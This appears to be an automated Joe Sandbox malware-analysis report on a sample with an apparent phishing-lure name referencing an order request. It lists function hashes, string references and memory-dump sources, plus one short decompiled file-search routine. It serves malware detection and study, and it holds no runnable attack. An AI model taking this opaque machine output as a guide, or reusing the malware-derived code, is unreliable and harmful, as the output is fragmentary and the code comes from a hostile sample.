Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: S$`
API String ID: 0-1082937318
Opcode ID: 07aefa9acce76c3498721bc1c97f0e8048e60bbaf9f6e1c653ffc365f8d53353
Instruction ID: 461eb6cb8065a5ad3d5b4e4a7ad3b12f42aa8a76bb37754d904afb9783ef6462
Opcode Fuzzy Hash: 07aefa9acce76c3498721bc1c97f0e8048e60bbaf9f6e1c653ffc365f8d53353
Instruction Fuzzy Hash: 4131CA71A047898AEF389D7C88B93D737A79F80650F89812F8D098B141D73607898745

Uniqueness

Uniqueness Score: -1.00%

Function 02FA6039 Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

`, xrefs: 02FA615C
S, xrefs: 02FA617D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: S$`
API String ID: 0-1082937318
Opcode ID: fdf6350ce426592ee6f7fb66d27b7cd9797b6cca75c5dd632abc320892f5bda0
Instruction ID: f362e215c6a366b42363309541f61b7a2adc8277d03a02bf2c1b4edf516a8c34
Opcode Fuzzy Hash: fdf6350ce426592ee6f7fb66d27b7cd9797b6cca75c5dd632abc320892f5bda0
Instruction Fuzzy Hash: 64314E72B00745DADF384D388DF63DB3697AF90790F8A812FDD0987144D73686858B05

Uniqueness

Uniqueness Score: -1.00%

Function 02FA0088 Relevance: 2.0, Strings: 1, Instructions: 720COMMON

Download Yara Rule

Strings

Du ., xrefs: 02FA017D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: Du .
API String ID: 0-777687968
Opcode ID: aa154359fde91789a502dac773cce2896926553b5946669bed62a6e0981b5cc3
Instruction ID: f0633d57670119cd41d555d6047a31e97a0b2afa85a99927969407aa7505716f
Opcode Fuzzy Hash: aa154359fde91789a502dac773cce2896926553b5946669bed62a6e0981b5cc3
Instruction Fuzzy Hash: 7B02ACC3F3F31989E7832030D6717E65740DF275C6D21CB6A5E26B15A27B2F4A8E8494

Uniqueness

Uniqueness Score: -1.00%

Function 02FA00C8 Relevance: 2.0, Strings: 1, Instructions: 717COMMON

Download Yara Rule

Strings

Du ., xrefs: 02FA017D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: Du .
API String ID: 0-777687968
Opcode ID: bfbcd10753c34917a8a1fec08bfe51fe0d926c672f347214afc7ffec58ec7306
Instruction ID: 76315a446c7d0dea584a6cbe0ff938cbf67c6a70df7c0f05c7cd67710a5e1ee9
Opcode Fuzzy Hash: bfbcd10753c34917a8a1fec08bfe51fe0d926c672f347214afc7ffec58ec7306
Instruction Fuzzy Hash: 9702ABC3F3B31589E7832030D6717E65740DF275C6D11CB6A4A2AB15A27B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA010C Relevance: 2.0, Strings: 1, Instructions: 709COMMON

Download Yara Rule

Strings

Du ., xrefs: 02FA017D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: Du .
API String ID: 0-777687968
Opcode ID: 11fb85fc00c4fb647bbdb2c4acdbf494a521314854cd0c5bfa12d8fc567c227b
Instruction ID: ab935ef72b06b85d8d42145bbe8de459e708f03552db04fb360299993646ee17
Opcode Fuzzy Hash: 11fb85fc00c4fb647bbdb2c4acdbf494a521314854cd0c5bfa12d8fc567c227b
Instruction Fuzzy Hash: FB02ABC3F3B31989E7832030D6317E65780DF275C6D11CB6A8E26B15A27B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA014A Relevance: 2.0, Strings: 1, Instructions: 708COMMON

Download Yara Rule

Strings

Du ., xrefs: 02FA017D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: Du .
API String ID: 0-777687968
Opcode ID: fb0465e93832f86fa54c5ee9a5fa71a10771d8e4fc86ceef91d2cb564b4e26b6
Instruction ID: 94828f73fc01d14f307972dc40abb2f12b351d83c20327eedd265aa460d1bbc7
Opcode Fuzzy Hash: fb0465e93832f86fa54c5ee9a5fa71a10771d8e4fc86ceef91d2cb564b4e26b6
Instruction Fuzzy Hash: 2002ABC3F3B31999E3833030D6717E65740DF275C6D51CB6A8A3AB15A27B2F4A8E8494

Uniqueness

Uniqueness Score: -1.00%

Function 02FA0045 Relevance: 2.0, Strings: 1, Instructions: 705COMMON

Download Yara Rule

Strings

Du ., xrefs: 02FA017D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: Du .
API String ID: 0-777687968
Opcode ID: cf97099d7e90e18d4b473efa6f4d68208aef3be84832d7bc0c786eaef1e442fb
Instruction ID: 713e027c4cb9edc17c117b1c36a53bdc9a3a5c978610087cb7e5dce77e42af1e
Opcode Fuzzy Hash: cf97099d7e90e18d4b473efa6f4d68208aef3be84832d7bc0c786eaef1e442fb
Instruction Fuzzy Hash: D202ABC3F3F31989E7832030D6717E65780DF275C6D21CB6B5A26B15A27B2F4A8E8494

Uniqueness

Uniqueness Score: -1.00%

Function 02FA002F Relevance: 1.9, Strings: 1, Instructions: 693COMMON

Download Yara Rule

Strings

Du ., xrefs: 02FA017D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: Du .
API String ID: 0-777687968
Opcode ID: cf37597f9978a8065587ab44c368d675fd96bcd6c5eb8bfc287aaab07b1980ea
Instruction ID: a5b2afb68db1112892b1bdccf2ca687043aaa42bef90627b20f4f1bdaace0378
Opcode Fuzzy Hash: cf37597f9978a8065587ab44c368d675fd96bcd6c5eb8bfc287aaab07b1980ea
Instruction Fuzzy Hash: 3C02ABC3F3F31589E7832030D6717E65780DF275C6D21CB6B5A26B15A27B2F4A8E8494

Uniqueness

Uniqueness Score: -1.00%

Function 02FA09E6 Relevance: 1.7, Strings: 1, Instructions: 443COMMON

Download Yara Rule

Strings

.FFF, xrefs: 02FA09E6

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: .FFF
API String ID: 0-740489797
Opcode ID: be4e3e5ae64fc4e8f76135938e02d16de8c3e9c9f2f9edd18d59b02b0a0c1edb
Instruction ID: a86426ac6f36b488302837c062dd30e5c1fe38445c11ae71749cc433d502e851
Opcode Fuzzy Hash: be4e3e5ae64fc4e8f76135938e02d16de8c3e9c9f2f9edd18d59b02b0a0c1edb
Instruction Fuzzy Hash: CAA1D0D7F3B31989E793203086717E76780CF135C2E528B5B4E3AB15A2772F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA1892 Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

8(((, xrefs: 02FA185C

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: 8(((
API String ID: 0-1248665178
Opcode ID: 042f862adb331089b504471c522153d960f289fe723fbaf173e91ebd1a519edf
Instruction ID: e90f01ef2ad5ee5822953b0a48ded65f2540442fcb945a9818ba8839b43300f3
Opcode Fuzzy Hash: 042f862adb331089b504471c522153d960f289fe723fbaf173e91ebd1a519edf
Instruction Fuzzy Hash: 25A1BBD7F2A70589E7533074C1717E22B81DF171C2E228B5B8E2E715A2771F0A8EC994

Uniqueness

Uniqueness Score: -1.00%

Function 02FA185C Relevance: 1.7, Strings: 1, Instructions: 404COMMON

Download Yara Rule

Strings

8(((, xrefs: 02FA185C

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: 8(((
API String ID: 0-1248665178
Opcode ID: 62c89b4a9328a6485199895a00daa69cebd726e97e8cfbac626f98e38dc460ff
Instruction ID: 84d4d3b31edc8530dce96d2e64466e2453bb2ee50cb87bff7a193ffacf78cc8f
Opcode Fuzzy Hash: 62c89b4a9328a6485199895a00daa69cebd726e97e8cfbac626f98e38dc460ff
Instruction Fuzzy Hash: 9FA1BBD7F2A70989E7533075C1717E21B81DF271C2E22CB5B8E2E715A1772F0A8E8994

Uniqueness

Uniqueness Score: -1.00%

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027FB(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402BBF(2), _t21 - 0x2b0) != 0xffffffff) {
					E00405F79( *((intOrPtr*)(_t21 - 0x10)), _t8);
					_push(_t21 - 0x284);
					_push(__esi);
					E00406032();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0x10)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402813
0x0040282e
0x00402839
0x0040283a
0x00402970
0x00402815
0x00402818
0x0040281b
0x0040281e
0x0040281e
0x00402a4f
0x00402a5b

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 75eab62fdf78de9f4e6b4c6b34eb097f986102a6510b1718f60f797d7a21670f
Instruction ID: a3d3032162d61e1c1d424b84de3592b50f389daf4c4fdff0a19fa7bc5af75a0d
Opcode Fuzzy Hash: 75eab62fdf78de9f4e6b4c6b34eb097f986102a6510b1718f60f797d7a21670f
Instruction Fuzzy Hash: 2BF05E716001149BC701EBA4DE49AAEB378FF04324F10457BE115E31D1D6B88A409B29

Uniqueness

Uniqueness Score: -1.00%

Function 02FA64E3 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

(g, xrefs: 02FA66B6

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: (g
API String ID: 0-1788970778
Opcode ID: ef7f3d1f490399455916bee86364b2ee6d432ab452aa37cd0e837ae60901fe51
Instruction ID: 5105f1fbf91f74b701267ca1b14e408bb88afbe8a793331fd038c09647d5c827
Opcode Fuzzy Hash: ef7f3d1f490399455916bee86364b2ee6d432ab452aa37cd0e837ae60901fe51
Instruction Fuzzy Hash: 74812271A043499FDB309E28CC657EB77EBAF593A0F96442ECC89DB250D3318985CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02FA6609 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

(g, xrefs: 02FA66B6

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: (g
API String ID: 0-1788970778
Opcode ID: cffff4c54bded35cba3862c84516db22760d0b53ee5c43e5e6cc984c25406446
Instruction ID: 283e0777a72e13f7eaa52df5d87e04f769fd1ba4981d56f42d66488aab03da30
Opcode Fuzzy Hash: cffff4c54bded35cba3862c84516db22760d0b53ee5c43e5e6cc984c25406446
Instruction Fuzzy Hash: 89513531A043499FDB309E7888657EA77E7AF4A360F96452FCCC9DB251D3314985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02FA872C Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

wK, xrefs: 02FA876E

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: wK
API String ID: 0-900654275
Opcode ID: 1d4dbf003a07cba8c55fdebd44a55c62af1d0fe768af0732f65f98129badb047
Instruction ID: d8209b56ea2f7a885099fb1399270e944558d84e511f08c63bb09a3ae7b8d065
Opcode Fuzzy Hash: 1d4dbf003a07cba8c55fdebd44a55c62af1d0fe768af0732f65f98129badb047
Instruction Fuzzy Hash: C561267590839A8FDF358E3889553CA3772EF52394F65007DCC899B516C3724A8A8B05

Uniqueness

Uniqueness Score: -1.00%

Function 02FA8A45 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

&oC, xrefs: 02FA8D9D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: &oC
API String ID: 0-2247462792
Opcode ID: bb76650c99a6c4c42d43d489c42126f4b08d988eaa840dffd308591a6ceba83f
Instruction ID: 8a3c6adce07cb82b8468287b73c648439244200facec84e95dec96c073e2b2c6
Opcode Fuzzy Hash: bb76650c99a6c4c42d43d489c42126f4b08d988eaa840dffd308591a6ceba83f
Instruction Fuzzy Hash: 8F5121B670434A8FDB358E28CE657EA33A2EF553D0F91816EDD8A9B214D3348945CB06

Uniqueness

Uniqueness Score: -1.00%

Function 02FA8AC0 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

&oC, xrefs: 02FA8D9D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: &oC
API String ID: 0-2247462792
Opcode ID: 6be64d19e0bd14d4bb7b9ed667daf895d814174ac3517c7d635c74f668da54a3
Instruction ID: d3c3bfb7a5ba6a0b6d22a4ff01330a7065e2d2946609838143a9fbf15bb9e6c9
Opcode Fuzzy Hash: 6be64d19e0bd14d4bb7b9ed667daf895d814174ac3517c7d635c74f668da54a3
Instruction Fuzzy Hash: 4E4122B16043498FDB359F28C9253EA77B2EF553D0F42406EDD8ACB210D3348A468B05

Uniqueness

Uniqueness Score: -1.00%

Function 02FA8C16 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

&oC, xrefs: 02FA8D9D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: &oC
API String ID: 0-2247462792
Opcode ID: 609f75f443729b524ace5956e99163aec852ba7c001b35fe6a63eb32d9ee384a
Instruction ID: 1f6da9ea8c9f0b8068a96de08ddaa25e7eb43f9224b66b75bbd97cd911991c0e
Opcode Fuzzy Hash: 609f75f443729b524ace5956e99163aec852ba7c001b35fe6a63eb32d9ee384a
Instruction Fuzzy Hash: EC419A74201386CFDF659F28C5957D57BB1FF12390F4880AACC9A9F16AC3348A42CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02FA8B20 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

&oC, xrefs: 02FA8D9D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: &oC
API String ID: 0-2247462792
Opcode ID: 137dda264170a2365578ccf80aa499c2861cad7052679f09ba589059fe377bd5
Instruction ID: b0d33daeafd4d58262aaec13485ecbee66b0d3115451ef4a22a40d53bad19bae
Opcode Fuzzy Hash: 137dda264170a2365578ccf80aa499c2861cad7052679f09ba589059fe377bd5
Instruction Fuzzy Hash: 76314270604349CFDB22AF28C9253EA37B2EF123E0F5105ADDD86CB212D37989458B45

Uniqueness

Uniqueness Score: -1.00%

Function 02FA8B9E Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

&oC, xrefs: 02FA8D9D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: &oC
API String ID: 0-2247462792
Opcode ID: db380fd656d0554a300b86e22ebe7666e5658f6bef654742dfde6606dfa2d845
Instruction ID: 17ebf026746b8e975cfe8aeecdeaa794622fb59bf3e12e8897a8b66a5843024b
Opcode Fuzzy Hash: db380fd656d0554a300b86e22ebe7666e5658f6bef654742dfde6606dfa2d845
Instruction Fuzzy Hash: 7321BF30208386CFCB659F28C9563EA77B2EF123D0F0145ADDC869B211D3388E45CB46

Uniqueness

Uniqueness Score: -1.00%

Function 02FA01CE Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae6961bf5e19c1bad882747cd193b2a8d1ce4c226386a5b3b82f7fe2b98e4a65
Instruction ID: 58f711965c83e0481c939152092909092caa269b5ad66458e3d4ae0b36eaf4c1
Opcode Fuzzy Hash: ae6961bf5e19c1bad882747cd193b2a8d1ce4c226386a5b3b82f7fe2b98e4a65
Instruction Fuzzy Hash: 77F1ABC3F3B31989E7832030D6707E65740DF275C6D52CB6B8A26B15A27B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA0248 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cfa6b01719a76cef28962aec31ccc6aeebc198d30a204c921629096d8759d62
Instruction ID: b7a22cd99e17bdd42f8fa2e479b5489a22821d1215a6979b9970339485e49098
Opcode Fuzzy Hash: 8cfa6b01719a76cef28962aec31ccc6aeebc198d30a204c921629096d8759d62
Instruction Fuzzy Hash: 08F1BBC3F3F31589E7832030D6717E66740DF271C6D12CB6B8A26B15A27B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA01FE Relevance: .6, Instructions: 648COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b5d5521283765108038a7e0a6b3efe6bcca93a1d8b98a85d57f03b7bd10cfd
Instruction ID: b27b9ce68a5cc65cb2430d2acef25253cde7198f6f7829963291a5f7a181b6aa
Opcode Fuzzy Hash: f1b5d5521283765108038a7e0a6b3efe6bcca93a1d8b98a85d57f03b7bd10cfd
Instruction Fuzzy Hash: A1F1BBC3F3B31989E7832030D6717E66740DF275C6D11CB6B8A36B15A27B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA0307 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d5eca013d21c7c17e7ad972488e23c65ee9ff5c4b2d9ba9fcd819704377250
Instruction ID: 037f2d0f2f3958965d98e349c5527ea1cf35bf29096c343d13a349cc7235f626
Opcode Fuzzy Hash: b8d5eca013d21c7c17e7ad972488e23c65ee9ff5c4b2d9ba9fcd819704377250
Instruction Fuzzy Hash: F5F1BCC7F3F31589E7832030D6307E66740DF235C6D52CB6B8A26B15A17B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA03C7 Relevance: .6, Instructions: 628COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a7a908ef7173eac72f01ba5ddac7582682407dc7ff799e3b68af2ef655fd2cb
Instruction ID: f87c3e445e8975a4d2d7e8a32669c1a6e8ef1d4b02e91d66080adb6f29dde948
Opcode Fuzzy Hash: 1a7a908ef7173eac72f01ba5ddac7582682407dc7ff799e3b68af2ef655fd2cb
Instruction Fuzzy Hash: 00E1BCC3F3B31988E7832030D6317E65741DF235C6D52CB6A8E2AB15A17B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA046A Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e9c530cf2e10a2a92b5cfd76d5ee8f39a594b56006a458b23576d7615993de2
Instruction ID: 756b0ad83241e222ee5c048774c806e77b6a5060a4229679c278a37c149a2edf
Opcode Fuzzy Hash: 3e9c530cf2e10a2a92b5cfd76d5ee8f39a594b56006a458b23576d7615993de2
Instruction Fuzzy Hash: BFE1CEC3F3B31589E7833030D6317E65741DF235C6D52CB6A8A3AB15A17B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA0349 Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ee137e3bdaa5e9825bb4a60ff84b4db4412f7fdedb3aff1d49ce06f8ca19dfc
Instruction ID: 83e00516e355b3bafc93e4c61ed01fb4f367c5ed1056219fade888cde42159ce
Opcode Fuzzy Hash: 0ee137e3bdaa5e9825bb4a60ff84b4db4412f7fdedb3aff1d49ce06f8ca19dfc
Instruction Fuzzy Hash: 90F1BCC3F3F31589E7832030D6317E66741DF235C6E51CB6B8A2AB15A17B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA038D Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093df00e18eaa23a34043baf481bb5c37f1d268f5c22c45b2e3544e69d091475
Instruction ID: 62767ef730b5d7a58d6772f0aa02169929b6d78a9ff7082a28515adee53639a4
Opcode Fuzzy Hash: 093df00e18eaa23a34043baf481bb5c37f1d268f5c22c45b2e3544e69d091475
Instruction Fuzzy Hash: 7CE1ABC3F3B31989E7832030D6317E65741DF235C6D51CB6A8E2AB15A27B2F4A8E8594

Uniqueness

Uniqueness Score: -1.00%

Function 02FA0403 Relevance: .6, Instructions: 595COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20005162a1fe5258c8250ca59a3c86bc7f9af88f1b2d7befc2f790935b00ee84
Instruction ID: 127fb07a2784f90c935b491f714c4d5b576845d7c4963f5e63437251c8e8f462
Opcode Fuzzy Hash: 20005162a1fe5258c8250ca59a3c86bc7f9af88f1b2d7befc2f790935b00ee84
Instruction Fuzzy Hash: 71E1BDC3F3B31989E7833030D6717E65741DF235C2D52CB6A8E2AB15A17B2F4A8E8594

